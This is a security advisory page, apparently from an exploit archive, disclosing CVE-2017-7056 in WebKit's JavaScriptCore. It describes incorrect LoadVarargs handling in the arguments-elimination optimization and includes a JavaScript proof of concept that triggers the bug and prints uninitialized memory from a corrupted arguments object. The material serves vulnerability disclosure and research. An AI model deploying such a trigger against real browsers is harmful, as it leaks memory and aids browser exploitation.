WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling

2017.07.25
Credit: lokihardt
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform CVE-2017-7056 Here is a snippet of ArgumentsEliminationPhase::transform case LoadVarargs: ... if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) { ... if (argumentCountIncludingThis <= varargsData->limit) { storeArgumentCountIncludingThis(argumentCountIncludingThis); // store arguments ... } node->remove(); node->origin.exitOK = canExit; break; } Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length. PoC: const kArgsLength = 0x101; let buggy = null; function inlineFunc() { if (arguments.length != kArgsLength) { buggy = arguments; } } class ClassForInine extends inlineFunc { } function sleep(ms) { let start = new Date(); while (new Date() - start < ms); } function main() { let args = new Array(kArgsLength); args.fill(333 + 1); args = args.join(', '); let opt = new Function(`(() => { new ClassForInine(${args}); })();`); for (let i = 0; i < 0x100000; i++) { opt(); if (i === 0x3000) sleep(1000); if (buggy) { print('buggy.length: ' + buggy.length); break; } } for (let i = 0, n = buggy.length; i < n; i++) { print(buggy[i]); } } main(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top